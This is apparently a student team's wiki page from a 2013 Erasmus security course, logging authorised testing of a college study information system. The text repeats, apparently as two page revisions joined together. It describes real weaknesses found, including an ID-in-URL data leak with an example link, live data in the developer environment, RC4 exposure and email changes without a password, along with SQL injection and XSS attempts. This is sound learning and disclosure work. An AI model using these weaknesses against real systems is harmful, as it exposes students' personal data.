* Sumorobot programming
* Dinner @ St Patricks

===Tuesday - 26.03.13===
'''Things what we did that day:'''
* Documentation!
A1 Injection - Sandra 

A2 Broken Authentication and Session Management (was formerly A3) - Kestutis 

A3 Cross-Site Scripting (XSS) (was formerly A2) - Kestutis 

A4 Insecure Direct Object References - Markus 

A5 Security Misconfiguration (was formerly A6)- Tomas 

A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - Mika 

A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - Sten 

A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - Matis 

A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - Jurij 

A10 Unvalidated Redirects and Forwards - Sten 

'''Problems what we faced:'''
* Still need to get everyone a VM with DVWA running

'''Things what we plan to do:'''
* Copy Paste documentation tasks to Wiki :)
* Divide OWASP tasks

===Wednesday - 27.03.13===
'''Things what we did that day:'''
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti's presentation and Wireshark.
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)

'''Problems what we faced:'''
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it's nothing.

'''Things what we plan to do:'''
* Estonian members are going to study last year's report and going to make a short overview to other members about it.
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher's side as well, because teachers have a little more access than students (grades, information about student etc).
* In demo environment we are going to test new functions (what haven't been included in main environment, yet) - as there's some new functionality.

===Thursday - 28.03.13===
'''Things what we did that day:'''
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])
* Discussed the schedule and to-do list for next days
* Discussed some potential vulnerabilities of SIS
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.
* Prepared software for testing (Backtrack, Kali)

'''Problems what we faced:'''
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line ("Start here and go this way"), we will just need to start and see what we will find.

'''Things what we plan to do:'''
* Find attack examples for the vulnerabilities
* Try them out on DVWA
* Get familiar with Tamper Data, Kali and Backtrack
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS
* See how to get authentication info from POST and GET

'''Security threat of a day'''
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What's more -> developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!

===Friday - 29.03.13===
'''Things what we did that day:'''
* Learned how to perform attacks. We learned different attack methods and tried them out.
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.
* Talked about last year's experience. Tried if most of the security holes are patched or not.

'''Problems what we faced:'''
* We need student access to developer environment
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)

'''Things what we plan to do:'''
* Analysis of the results needs to be done
* Learn a little bit more about attacks
* Create some attacks
* Start to test simpler attacks to SIS

'''Security threats of the day:'''
* One can see other student's exam plan just by chaning student_id value in the URL (you don't need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to "My data" and just change ID from the URL again.
''For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322''

===Saturday - 30.03.13===
'''Things what we did that day:'''
* Visiting Tallinn TV Tower
* Visitinig The Seaplane Harbour

===Sunday - 31.03.13===
'''Free day'''

===Monday - 01.04.13===
'''NB! April fools' day!''' Beware!

'''Things what we did that day:'''
* We analyzed student information fields in "My data" section
* We test different sections and tried to change user IDs - luckily these are safe now.
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!
* Tried reflected XSS, most SIS areas escape "bad characters" out from input boxes.
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons ''(for example: other person taking exams claiming he/she is someone he/she is not)''

'''Problems what we faced:'''
* Still no new declaration etc opened for us. Maybe tomorrow?

'''Things what we plan to do:'''
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don't have much time left.
* Go deeper with different attacks and methods.

'''Security threat's of the day:'''
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user's cookies and then grant access to attacker.
* There's no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.
* Calendar: there's no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.
* There are some developer's notes left in different SIS parts (not only in developer environment).

===Tuesday - 02.04.13===
'''Things what we did that day:'''
* Visiting Skype office.
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.
* SIS is using a field called "security_key_sis_global". This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person's name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on "Forgot my password".

'''Problems what we faced:'''
* Really would have liked to have more time to test.

'''Things what we plan to do:'''
* Prepare and rehearse the presentation
* Look further into the e-mail modification issue.
* Finalise ASVS review

===Wednesday - 03.04.13===
'''Things what we did that day:'''
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to "audience".
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.

'''Problems what we faced:'''
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.

'''Things what we plan to do:'''
* We want to review and rehearse our final presentation.
* Update our documentation in Wiki.
* Upload and link presentations to persons and fill gaps in documentation.

===Thursday - 04.04.13===
'''Things what we did that day:'''
* Dress rehearsal. Updated presentation according to feedback and capabilities.
* Updated documentation to Wiki and uploaded missing presentations.
* Personal input section filling in Wiki.
* Went bowling. :)

'''Problems what we faced:'''
* Sometimes one minute feels like it is not a minute. :)

'''Things what we plan to do:'''
* Final documentation (link to Google docs).
* IP feedback
* Summarisation

===Friday - 05.04.13===
'''Things what we did that day:'''
* Discussion about today's plans.
* Upgraded and linked final documentation from Google Drive (aka Google Docs) (link can be found in Materials[[#Materials_.28slides_etc.29]] section and [[#Final documentation]] section).
* Every member wrote a feedback to Wiki page
* Every member wrote a feedback according to requirements of the Intensive Programme (Erasmus feedback)
* IP summarisation.
* Farewell party at St. Patrick's.

'''Problems what we faced:'''

'''Things what we plan to do:'''
* Farewell party, sleep well and start trip to home! :)

===Saturday - 06.04.13===
'''Departure! Bye bye!'''

==Materials (slides etc)==
* '''Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother'''
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)

* '''Day summarisation:'''
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]

* '''Security teamwork (whiteboard):'''
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)

* '''Virtual Machines (VM VirtualBox .ova files):
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]

* '''Final presentation of the project to the clients (4 April 2013)'''
** [[Media:2013_security_final_presentation.pdf|Presentation slides]] ''(Made by whole team, structure by Sandra and Jurij)''
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360] ''(Team Security starts from 18:30)''

* '''Final documentation'''
** Can be found in Google Drive (link will be here soon).

==Results==
Summary of what we did and solution what we developed

===Personal input===
====Sten Aus====
* '''What I did:'''
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).

* '''What I learned:'''
** How to do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.
** I learned how big value "same day feedback and summarisation" has.
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).

====Matis Palm====
* '''What I did:'''
** Helped teaching Apache & Linux & DVWA to other participants (due to having some experience already from before).
** Helping with sumorobot programming (Being from the robotics club).
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.

* ''' What I learned:'''
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).

====Sandra Suviste====
* '''What I did:'''
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).
** Practised attacks on the DVWA.
** Went through the OWASP ASVS document for possible shortcomings of the SIS.
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.
** Documented my own and others' work.
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]).

* '''What I learned:'''
** A lot about web application vulnerabilities - from my own research & practice and from others' presentations and teachers' lectures.
** Became more experienced in working in a multinational group with English as the working language.
** I learned how to document my work in order to keep track of the work of the team.
** I also learned what are the issues connected to the preparing of and giving a presentation with several (>3) presenters.

====Markus Rintamäki====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).
** Different attacks on SIS, changing user ids, SQL injection and XSS.
** Tried to upload a picture (for a lecturer) infected with malicious .php code.
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.
** We made the presentation structure together.
** Googeled a lot :)

* '''What I learned:'''
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.
** Basic attack methods in DVWA: SQL injection, XSS and CSRF.
** What is SIS and how does it works?
** I also learned to program sumorobots, more about Linux and Wireshark.
** And also of course I learned to speak english more fluently. :)

====Tomas Lepistö====
* '''What I did:'''
** Tried to find out possible security holes from OIS site.
** Tested different attacking methods with DVWA
** SQL-injection tests into various places on OIS site.
** Tested some XSS methods
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).
** Prepared our presentation with other group members
** Spoke in daily summary
** Studied a lot of information to know what is hacking about?

* '''What i learned:'''
** I learned how to use SQL-injection, XSS, Brute force, CSRF
** I learned also how to use Kali,Backtrack,Temper data, DVWA
** Working in international group
** How important documentation is
** Found out how important it is to make web-application secure

====Mika Salmela====
* '''What I did:'''
** I studied hacking methods
** Tried some hacking methods with DVWA
** Iscanned website, try to find if there is some security risks
** Tried some SQL and XSS injections
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|(A6 - Sensitive Data Exposure]]).

* '''What I learned:'''
** More than basics of how to hack?
** The most common hacking methods and how to use them.
** How to do SQL and XSS injections
** Basics of hacking tools
** How to find security risks
** How to work in international team.
** Learned much about what these are: DVWA, OWASP and ASVS.

====Kęstutis Tautvydas====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).
** Searched for security holes in OIS student information site.
** Used DVWA tool to test sql injections and xss scripting.
** Tried some sql injections and xss scripting on OIS page
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates
** Prepared some slides for the main presentation

* '''What have I learned:'''
** Theory about OWASP TOP 10 threats
** How to do sql injections
** How to use Firefox tamperdata tool
** How to do cross-site scripting
** Completely understood what is use case and how to draw them
** How to monitor activities with Wireshark
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8

====Jurij Lukjančikov====
* '''What I did:'''
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])
** I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])
** XSS and injection attacks to SIS

* '''What have I learned:'''
** I have learned about security breaches on the web.
** I have tried different parts of web for vulnerabilities and injection.
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).

===Final documentation===
====Analysis====

====Solution====

==IP Feedback==
===Feedback from Sten Aus===
I liked IP very much. It was very mindopening experience and definitely I am going to suggest this to my friends, so they can participate next time. I think that it is very good to participate in multicultural group, where all the participants are from different countries.
I did not like that we had to sit so much in lectures. :) And from time to time it was hard to understand the meaning of lecture, I could not link it to our project. But I think it will come to me after a few days, months or years, as a lot in this life - you don't know the purpose yet, but you will find it out in the future.

I enjoyed food a lot, it was a good choice to take lunches and dinners from Rahva Toit. :) Also, the pricing was good.

I enjoyed out-of-schedule activities. For example, I liked visiting TV tower and Seaplane Harbour. I have been to TV tower before, but still it was very enjoyable experience. Also, I appreciate that Sander organized pool and bowling. Despite the fact I could not participate in pool, I was in bowling "competition" and it was fun!

===Feedback from Matis Palm===

===Feedback from Sandra Suviste===

===Feedback from Markus Rintamäki===

===Feedback from Tomas Lepistö===

===Feedback from Mika Salmela===
* What I did like:
** First of all, i would like thank you everyone!
** Everything was organized well. It was nice to meet new people from other countries. Also all events were excellent!

* What I did not like:
** Not so much free time T.T

===Feedback from Kęstutis Tautvydas===

===Feedback from Jurij Lukjančikov===
* '''What I did like:'''
** Working in teams.
** Meeting new people.
** Seeing new places.
** Learning new things.

* '''What I did not like:'''
** Too long studying/working days.
** Brainstorming after whole day of lectures.

Security

2013-04-05T08:32:01Z

Saus: /* Feedback from Mika Salmela */

Team page for [[Deploying IT Infrastructure Solutions]].

==Team Members==
*Sten Aus, Estonian Information Technology College
*Matis Palm, Estonian Information Technology College
*Sandra Suviste, Estonian Information Technology College
*Markus Rintamäki, Vaasa University of Applied Sciences
*Tomas Lepistö, Vaasa University of Applied Sciences
*Mika Salmela, Vaasa University of Applied Sciences
*Kęstutis Tautvydas, Vilnius University of Applied Sciences
*Jurij Lukjančikov, Vilnius University of Applied Sciences

==Goal==
*OWASP top 10
*HACK DVWA
*BackTrack, SamuraiCD (Last year experience)
*Scanning and testing tools - Qualys SSL Labs
*Acunetix Web Vulnerability Scanner v.8
*SubGraph Vega
*BEAST attack
*RC4

==Activity==
===Monday - 25.03.13===
'''Things what we did that day:'''
* Lectures
* Sumorobot programming
* Dinner @ St Patricks

===Tuesday - 26.03.13===
'''Things what we did that day:'''
* Documentation!
A1 Injection - Sandra 

A2 Broken Authentication and Session Management (was formerly A3) - Kestutis 

A3 Cross-Site Scripting (XSS) (was formerly A2) - Kestutis 

A4 Insecure Direct Object References - Markus 

A5 Security Misconfiguration (was formerly A6)- Tomas 

A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - Mika 

A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - Sten 

A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - Matis 

A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - Jurij 

A10 Unvalidated Redirects and Forwards - Sten 

'''Problems what we faced:'''
* Still need to get everyone a VM with DVWA running

'''Things what we plan to do:'''
* Copy Paste documentation tasks to Wiki :)
* Divide OWASP tasks

===Wednesday - 27.03.13===
'''Things what we did that day:'''
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti's presentation and Wireshark.
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)

'''Problems what we faced:'''
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it's nothing.

'''Things what we plan to do:'''
* Estonian members are going to study last year's report and going to make a short overview to other members about it.
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher's side as well, because teachers have a little more access than students (grades, information about student etc).
* In demo environment we are going to test new functions (what haven't been included in main environment, yet) - as there's some new functionality.

===Thursday - 28.03.13===
'''Things what we did that day:'''
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])
* Discussed the schedule and to-do list for next days
* Discussed some potential vulnerabilities of SIS
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.
* Prepared software for testing (Backtrack, Kali)

'''Problems what we faced:'''
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line ("Start here and go this way"), we will just need to start and see what we will find.

'''Things what we plan to do:'''
* Find attack examples for the vulnerabilities
* Try them out on DVWA
* Get familiar with Tamper Data, Kali and Backtrack
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS
* See how to get authentication info from POST and GET

'''Security threat of a day'''
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What's more -> developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!

===Friday - 29.03.13===
'''Things what we did that day:'''
* Learned how to perform attacks. We learned different attack methods and tried them out.
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.
* Talked about last year's experience. Tried if most of the security holes are patched or not.

'''Problems what we faced:'''
* We need student access to developer environment
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)

'''Things what we plan to do:'''
* Analysis of the results needs to be done
* Learn a little bit more about attacks
* Create some attacks
* Start to test simpler attacks to SIS

'''Security threats of the day:'''
* One can see other student's exam plan just by chaning student_id value in the URL (you don't need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to "My data" and just change ID from the URL again.
''For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322''

===Saturday - 30.03.13===
'''Things what we did that day:'''
* Visiting Tallinn TV Tower
* Visitinig The Seaplane Harbour

===Sunday - 31.03.13===
'''Free day'''

===Monday - 01.04.13===
'''NB! April fools' day!''' Beware!

'''Things what we did that day:'''
* We analyzed student information fields in "My data" section
* We test different sections and tried to change user IDs - luckily these are safe now.
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!
* Tried reflected XSS, most SIS areas escape "bad characters" out from input boxes.
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons ''(for example: other person taking exams claiming he/she is someone he/she is not)''

'''Problems what we faced:'''
* Still no new declaration etc opened for us. Maybe tomorrow?

'''Things what we plan to do:'''
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don't have much time left.
* Go deeper with different attacks and methods.

'''Security threat's of the day:'''
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user's cookies and then grant access to attacker.
* There's no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.
* Calendar: there's no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.
* There are some developer's notes left in different SIS parts (not only in developer environment).

===Tuesday - 02.04.13===
'''Things what we did that day:'''
* Visiting Skype office.
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.
* SIS is using a field called "security_key_sis_global". This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person's name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on "Forgot my password".

'''Problems what we faced:'''
* Really would have liked to have more time to test.

'''Things what we plan to do:'''
* Prepare and rehearse the presentation
* Look further into the e-mail modification issue.
* Finalise ASVS review

===Wednesday - 03.04.13===
'''Things what we did that day:'''
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to "audience".
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.

'''Problems what we faced:'''
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.

'''Things what we plan to do:'''
* We want to review and rehearse our final presentation.
* Update our documentation in Wiki.
* Upload and link presentations to persons and fill gaps in documentation.

===Thursday - 04.04.13===
'''Things what we did that day:'''
* Dress rehearsal. Updated presentation according to feedback and capabilities.
* Updated documentation to Wiki and uploaded missing presentations.
* Personal input section filling in Wiki.
* Went bowling. :)

'''Problems what we faced:'''
* Sometimes one minute feels like it is not a minute. :)

'''Things what we plan to do:'''
* Final documentation (link to Google docs).
* IP feedback
* Summarisation

===Friday - 05.04.13===
'''Things what we did that day:'''
* Discussion about today's plans.
* Upgraded and linked final documentation from Google Drive (aka Google Docs) (link can be found in Materials[[#Materials_.28slides_etc.29]] section and [[#Final documentation]] section).
* Every member wrote a feedback to Wiki page
* Every member wrote a feedback according to requirements of the Intensive Programme (Erasmus feedback)
* IP summarisation.
* Farewell party at St. Patrick's.

'''Problems what we faced:'''

'''Things what we plan to do:'''
* Farewell party, sleep well and start trip to home! :)

===Saturday - 06.04.13===
'''Departure! Bye bye!'''

==Materials (slides etc)==
* '''Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother'''
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)

* '''Day summarisation:'''
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]

* '''Security teamwork (whiteboard):'''
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)

* '''Virtual Machines (VM VirtualBox .ova files):
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]

* '''Final presentation of the project to the clients (4 April 2013)'''
** [[Media:2013_security_final_presentation.pdf|Presentation slides]] ''(Made by whole team, structure by Sandra and Jurij)''
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360] ''(Team Security starts from 18:30)''

* '''Final documentation'''
** Can be found in Google Drive (link will be here soon).

==Results==
Summary of what we did and solution what we developed

===Personal input===
====Sten Aus====
* '''What I did:'''
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).

* '''What I learned:'''
** How to do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.
** I learned how big value "same day feedback and summarisation" has.
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).

====Matis Palm====
* '''What I did:'''
** Helped teaching Apache & Linux & DVWA to other participants (due to having some experience already from before).
** Helping with sumorobot programming (Being from the robotics club).
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.

* ''' What I learned:'''
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).

====Sandra Suviste====
* '''What I did:'''
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).
** Practised attacks on the DVWA.
** Went through the OWASP ASVS document for possible shortcomings of the SIS.
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.
** Documented my own and others' work.
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]).

* '''What I learned:'''
** A lot about web application vulnerabilities - from my own research & practice and from others' presentations and teachers' lectures.
** Became more experienced in working in a multinational group with English as the working language.
** I learned how to document my work in order to keep track of the work of the team.
** I also learned what are the issues connected to the preparing of and giving a presentation with several (>3) presenters.

====Markus Rintamäki====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).
** Different attacks on SIS, changing user ids, SQL injection and XSS.
